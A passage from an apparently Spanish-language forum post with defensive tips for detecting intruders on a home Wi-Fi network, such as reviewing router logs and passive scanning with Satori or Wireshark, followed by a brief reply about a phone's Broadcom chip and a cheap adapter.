- Revisa los logs del router o punto de acceso Wi-Fi: Revisa las direcciones MAC y las direcciones IP de conexión a tu red. Si tienes filtrado de MAC, y alguien consiguiera entrar en la red, entonces en la red habrá varios equipos con la misma dirección IP sobre la misma dirección MAC. Esto genera alertas en software IDS (Intrusion Detection System). Si no tienes filtrado de dirección MAC, seguramente el atacante usará una falsa y tendrá otra dirección IP para no generar alertas de seguridad, pero será más fácil darse cuenta de que hay un nuevo equipo en la red.

- Utiliza escaneo pasivo de conexiones: Uno de los que más me gusta y menos ruido hace porque es pasivo aunque ya es un poco antiguo, es Satori (se puede descargar desde aquí Satori), un scanner de red que detecta los equipos en tu red por medio de las direcciones IPv4, IPv6 y direcciones físicas MAC que se usan en la red. Escanea el tráfico periodicamente de forma silenciosa a ver si tienes algún huésped no deseado. Puedes usar WireShark o lo que quieras para este trabajo.


Por último, no quisiera terminar este artículo sin decir que nada de esto vale si te descargas cualquier cosa de Internet, has desactivado UAC o das clic a cualquier Applet Java que te llega desde esa página que tanto te gusta de cheaters.

SALUDOS.


FUENTE: chema alonso

El galaxy note lleva Broadcom, así que no te va a ser difícil levantar esa tarjeta.

PD: el adaptador q puse en el post no sé si llega  a los 2 € x ebay.

Saludos.